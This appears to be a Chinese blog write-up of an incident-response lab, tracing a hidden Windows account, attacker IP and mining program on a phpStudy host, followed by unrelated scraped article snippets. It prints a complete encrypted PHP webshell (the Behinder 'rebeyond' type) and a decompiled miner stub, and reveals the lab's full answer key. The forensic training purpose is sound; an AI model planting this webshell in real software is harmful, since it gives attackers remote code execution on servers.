news 2026/4/15 16:41:14

应急响应靶场 - web1

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
应急响应靶场 - web1

前景需要:

小李在值守的过程中,发现有CPU占用飙升,出于胆子小,就立刻将服务器关机,这是他的服务器系统,请你找出以下内容,并作为通关条件:

1.攻击者的shell密码

2.攻击者的IP地址

3.攻击者的隐藏账户名称

4.攻击者挖矿程序的矿池域名

用户:

administrator

密码

Zgsf@admin.com

一、题目要求

  1. 攻击者的 shell 密码
  2. 攻击者的 IP 地址
  3. 攻击者创建的隐藏账户名称
  4. 攻击者挖矿程序使用的矿池域名(仅域名)

二、应急响应总体思路

真实应急响应中,一般遵循以下顺序:

  1. 账户异常排查(最快、最明显)
  2. Web 服务与 WebShell 排查
  3. 日志溯源(锁定攻击 IP)
  4. 恶意程序与挖矿行为确认
  5. 逆向分析恶意程序,提取矿池信息

三、隐藏账户排查(问题 3)

3.1 为什么先查账户?

攻击者在 Web 入侵成功后,最稳定的持久化方式就是创建系统账户,这样即使 WebShell 被删,也能重新登录系统。

3.2 查看本地用户和组

使用图形界面方式:

Win + R → lusrmgr.msc

打开 “本地用户和组 → 用户”,查看所有用户

3.3 发现隐藏账户

在用户列表中发现一个明显异常用户:

hack168$
判断依据:
  • $结尾(Windows 中常用于隐藏账户)
  • 非系统默认用户
  • 明显人为创建

攻击者的隐藏账户名称:hack168$

用命令确认:

$net user hack168$ 用户名 hack168$ 全名 注释 用户的注释 国家/地区代码 000 (系统默认值) 帐户启用 Yes 帐户到期 从不 上次设置密码 2024/2/26 23:01:13 密码到期 从不 密码可更改 2024/2/26 23:01:13 需要密码 Yes 用户可以更改密码 Yes 允许的工作站 All 登录脚本 用户配置文件 主目录 上次登录 2024/2/26 23:02:24 可允许的登录小时数 All 本地组成员 *Administrators *Users 全局组成员 *None 命令成功完成。

四、Web 服务排查与 WebShell 定位(问题 1)

4.1 确认 Web 环境

桌面存在 phpStudy / 小皮面板,说明该主机运行 Web 服务

通过浏览器访问本机 80 端口:

http://127.0.0.1

推断攻击者大概率通过 Web 上传漏洞 / Web RCE 入侵

phpStudy路径:

4.2 使用 D 盾扫描 Web 目录

www目录使用 D 盾 WebShell 查杀工具扫描:

获得webshell路径:C:\phpStudy_pro\WWW\content\plugins\tips\shell.php

4.3 查看 WebShell 内容

打开 WebShell 文件,发现典型一句话木马结构,并在代码中直接写死了密码:

<?php @error_reporting(0); session_start(); $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond $_SESSION['k']=$key; session_write_close(); $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params); ?>
$password = "rebeyond";

攻击者的 shell 密码:rebeyond

五、日志分析定位攻击者 IP(问题 2)

启动服务查看

5.1 为什么要看 Apache 日志?

既然确认是 WebShell 上传,那么攻击者的 IP 一定会出现在 Web 访问日志 中

5.2 Apache 日志路径

phpStudy 默认 Apache 日志路径:

C:\phpstudy_pro\Extensions\Apache2.4.39\logs\

重点文件:

access.log

5.3 分析 access.log

打开access.log,结合以下特征筛选:

  • POST 请求
  • 上传脚本
  • 访问 WebShell 文件
  • 请求参数异常

最终定位到攻击源 IP:

192.168.126.1

攻击者的 IP 地址:192.168.126.1

弱口令admin,123456能登录

六、挖矿行为确认与恶意程序定位

6.1 异常现象

在桌面操作过程中发现:

  • 运行某个可疑程序后
  • CPU 使用率瞬间 100%

这是非常典型的 挖矿行为特征

6.2 锁定挖矿程序

在隐藏账户hack168$的目录中发现可疑文件:

Kuang.exe

运行即拉满 CPU,基本可以确认:该程序为挖矿木马

七、逆向挖矿程序,提取矿池域名(问题 4)

7.1 为什么要逆向?

挖矿程序一定要连接矿池服务器,矿池地址通常:

  • 写死在代码中
  • 或以字符串形式存在

7.2 判断程序类型

使用file/ 观察行为后发现:

  • Kuang.exe为 PyInstaller 打包的 Python 程序

7.3 使用 PyInstaller 反编译

工具准备:

  • pyinstxtractor.py

执行:

python pyinstxtractor.py Kuang.exe

成功解包,得到.pyc文件

7.4 反编译 pyc

Kuang.pyc上传至 在线 pyc 反编译网站,还原为.py文件

# Decompiled with PyLingual (https://pylingual.io) # Internal filename: Kuang.py # Bytecode version: 3.8.0rc1+ (3413) # Source timestamp: 1970-01-01 00:00:00 UTC (0) import multiprocessing import requests def cpu_intensive_task(): while True: try: requests.get('http://wakuang.zhigongshanfang.top', timeout=10) except: pass if __name__ == '__main__': cpu_count = multiprocessing.cpu_count() processes = [multiprocessing.Process(target=cpu_intensive_task) for _ in range(cpu_count)] for process in processes: process.start() for process in processes: process.join()

在源码中发现如下关键字符串:

http://wakuang.zhigongshanfang.top

这是挖矿程序连接的矿池地址

挖矿程序的矿池域名:wakuang.zhigongshanfang.top

八.逆向题目exe

步骤同上

# Decompiled with PyLingual (https://pylingual.io) # Internal filename: '解题.py' # Bytecode version: 3.8.0rc1+ (3413) # Source timestamp: 1970-01-01 00:00:00 UTC (0) print('公众号:知攻善防实验室') print('欢迎使用知攻善防实验室-应急响应训练靶机解题系统') print('在此之前,您应该获取到以下信息') print('1.攻击者的shell密码') print('2.攻击者的IP地址') print('3.攻击者的隐藏账户名称') print('4.攻击者挖矿程序的矿池域名') num = input('你准备好了吗?(y or n)') if num == 'y': shellpass = input('请输入攻击者的shell密码:') if shellpass == 'rebeyond': print('题解正确!') IPadd = input('请输入攻击者的IP地址') if IPadd == '192.168.126.1': print('题解正确!') username = input('请输入攻击者的隐藏账户名称:') if username == 'hack168' or username == 'hack168$': print('题解正确!') wakuang = input('请输入攻击者挖矿程序的矿池域名:') if wakuang == 'wakuang.zhigongshanfang.top': print('题解正确!') print('恭喜您,该靶机已被您攻破!') print('恭喜您,该靶机已被您攻破!') print('恭喜您,该靶机已被您攻破!') print('恭喜您,该靶机已被您攻破!') # return None

直接能逆出答案

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/8 18:44:56

SGMICRO圣邦微 SGM722XMS/TR MOSP8 运算放大器

特性 .低成本 .轨到轨输入和输出&#xff0c;典型VOS为1mv .高增益带宽产品:10MHz .高斜率:8.5V/us .在2V步进下&#xff0c;达到0.1%的稳定时间:0.36us过载恢复时间:0.4微秒低噪声:8nV/Hz .工作电压范围为2.5V至5.5V电源 .输入电压范围-0.1V至5.6V&#xff0c;Vs5.5V.低功耗 放…

作者头像 李华
网站建设 2026/4/14 8:53:12

自适应变分模态轴承故障诊断【附代码】

✨ 本团队擅长数据搜集与处理、建模仿真、程序设计、仿真代码、论文写作与指导&#xff0c;毕业论文、期刊论文经验交流。 ✅ 专业定制毕设、代码 ✅ 成品或定制&#xff0c;查看文章底部微信二维码 (1) 基于麻雀搜索算法优化变分模态提取的轴承微弱故障特征增强方法 滚动轴承…

作者头像 李华
网站建设 2026/4/10 18:29:01

地铁自动扶梯智能运维管理平台【附系统】

✨ 本团队擅长数据搜集与处理、建模仿真、程序设计、仿真代码、论文写作与指导&#xff0c;毕业论文、期刊论文经验交流。✅ 专业定制毕设、代码✅ 成品或定制&#xff0c;查看文章底部微信二维码(1) 智能检修管理系统的闭环流程设计智能检修管理系统的核心在于建立从计划制定到…

作者头像 李华
网站建设 2026/4/13 11:11:30

百考通AIGC检测:为学术原创筑牢坚实防线

在AI写作工具普及的今天&#xff0c;学术诚信面临着新的挑战。当你用AI辅助完成论文初稿&#xff0c;是否担心被检测出AI生成痕迹&#xff1f;当你收到学生的作业&#xff0c;又如何分辨内容是原创还是AI合成&#xff1f;百考通&#xff08;https://www.baikaotongai.com&#…

作者头像 李华
网站建设 2026/4/15 15:26:30

亲测好用自考必备8个AI论文平台测评

亲测好用自考必备8个AI论文平台测评 2026年自考论文写作工具测评&#xff1a;为什么需要一份专业榜单&#xff1f; 随着人工智能技术的不断进步&#xff0c;越来越多的自考生开始借助AI论文平台提升写作效率、优化内容质量。然而&#xff0c;市面上的工具种类繁多&#xff0c;功…

作者头像 李华
网站建设 2026/4/13 8:51:37

机器人系统架构十年演进典型架构对比

在专业机器人工程领域&#xff0c;过去十年的系统架构演进可以被视为从**“基于模块通信的分布式工具箱”向“基于数据驱动的具身智能中枢”**的跨越。 为了更直观地对比这种范式转移&#xff0c;我们将演进过程划分为三个典型架构阶段&#xff1a;ROS 1 时代的微服务架构、ROS…

作者头像 李华